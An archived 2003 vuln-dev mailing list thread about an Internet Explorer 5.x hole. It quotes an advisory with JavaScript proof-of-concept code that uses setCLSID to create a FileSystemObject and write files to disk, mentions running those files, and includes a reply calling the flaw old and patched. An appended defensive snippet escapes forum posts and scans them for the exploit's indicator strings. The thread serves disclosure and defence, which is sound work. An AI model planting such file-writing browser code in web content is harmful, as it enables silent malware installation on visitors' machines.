Vulnerability Development mailing list archives
RE: Internet Explorer JavaScript insecure function
From: "Scovetta, Michael V" <Michael.Scovetta () ca com>
Date: Mon, 8 Dec 2003 13:58:54 -0500
This is an old exploit, google "setCLSID" and you'll see a bunch of docs referencing this exploit. From what I gather, it's the result of some combination of a buggy WshShell, jscript.dll, and bad Internet-Zone security values. I believe Microsoft fixed this more than two years ago, as per: http://www.microsoft.com/technet/security/bulletin/MS01-015.asp (and probably others).

If you're still using IE 5.x, you should just upgrade. I'm sure that there are many users still using 5.x browsers, but if you have it totally patched, this should not be exploitable.

And WriteLine is a function of the ActiveX FileSystemObject, which has nothing to do with JavaScript-- JS only provides the ability to call ActiveX functions.

I was unable to get this exploit to work, regardless of my security settings, using 6.0.2800.1106.

Michael Scovetta

-----Original Message-----
From: FREEBRAIN [mailto:freebrain () unionnewbies net]
Sent: Sunday, December 07, 2003 9:57 AM
To: vuln-dev () securityfocus com
Subject: Internet Explorer JavaScript insecure function

* Internet Explorer JavaScript insecure function *

Product: Microsoft Internet Explorer
Version: 5.x (probably other versions may be affected)

*** Problem:

I discovered a javascript function (interpreted by Internet Explorer) called "file.writeline()" may be potentially dangerous for Internet Explorer users. This function allows writing files by means of JavaScript on a hard disk. An attacker may use this function writing JavaScript code in posts of forums, guestbooks, etc for owning his victim's computers. With "file.writeline()" function the attacker can write trojans/virus/etc on his victim's hard disks, for example, an attacker may use JavaScript "file.writeline()" function for writing a malicious file in VBS (Visual Basic Scripting) language. I repeat, this may be potentially dangerous for Internet Explorer users.

NOTE: Actually a virus in the wild that affects mIRC users is using this function ("file.writeline").

NOTE2: As you can see on the "Proof of concept", other functions are needed to carry out an "intrusion".

*** Proof of concept:

    InterfaceObject=document.applets[0];
    setTimeout("Write()",1000);
    function Write() {
        fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
        InterfaceObject.setCLSID(fsoClassID);
        fso = InterfaceObject.createInstance();
        // windir = fso.getspecialfolder ;
        filename = "\\proof.txt";
        var filecontent = "Hello world";
        file = fso.opentextfile(filename, "2", "TRUE");
        file.writeline(filecontent);
        file.close();
    }

This code writes a file called "proof.txt" on the hard disk, with the content "Hello world". Also you can execute files you write by means of JavaScript adding "Run();" to the function.

*** Solution:

I'm not sure about the solution but I recommend upgrading to the last version of Internet Explorer. Also I recommend webmasters to forbid HTML codes that contain this function in their forums, guestbooks, etc.

*** Thanks to:

#disidents,#hackers,#hacker @ irc-phoenix.org
#disidents,#sleepx,#ayuda_internet @ irc-hispano.org
Special thanks go to: Impos, |_Tr0mP4s

(sorry my poor English)

*** By FREEBRAIN

FREEBRAIN is a member of DisidentS Hacker Team
http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents
<freebrain () unionnewbies net> ( www.unionnewbies.net )
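The advice to webmasters in the message above, sketched as an added example that is not part of the original thread: user-submitted forum or guestbook text is HTML-escaped before storage (the actual control), and the strings visible in the quoted proof of concept are matched only to log suspicious posts. The names `INDICATORS`, `decodeEntities`, `scanPost`, `escapeHtml` and `acceptPost` are hypothetical, and the sample posts in the test are constructed.

```javascript
// Added example (not from the original thread). Indicator strings are taken
// from the proof of concept quoted in the message above.
const INDICATORS = [
  { name: "fso-clsid", re: /0D43FE01-F093-11CF-8940-00A0C9054228/i },
  { name: "setCLSID", re: /\bsetCLSID\s*\(/i },
  { name: "createInstance", re: /\bcreateInstance\s*\(/i },
  { name: "applet-access", re: /document\s*\.\s*applets\b/i },
  { name: "active-tag", re: /<\s*(script|applet|object|embed)\b/i },
];

// Decode numeric and basic named entities before matching, in case a later
// stage of the application decodes entities before rendering.
function decodeEntities(s) {
  const named = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(lt|gt|amp|quot|apos);/gi, (_, n) => named[n.toLowerCase()]);
}

// Return the names of all indicators found in a submitted post (for logging).
function scanPost(html) {
  const text = decodeEntities(html);
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Output-encode the post so no markup in it is ever interpreted by a browser.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Every post is escaped regardless of the scan result; hits are advisory only.
function acceptPost(html) {
  return { hits: scanPost(html), safeHtml: escapeHtml(html) };
}
```

A blocklist like `INDICATORS` is easy to sidestep, which is why the escaping step does not depend on it.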
Current thread:
- Internet Explorer JavaScript insecure function FREEBRAIN (Dec 08)
- Re: Internet Explorer JavaScript insecure function npguy (Dec 09)
- <Possible follow-ups>
- RE: Internet Explorer JavaScript insecure function Scovetta, Michael V (Dec 08)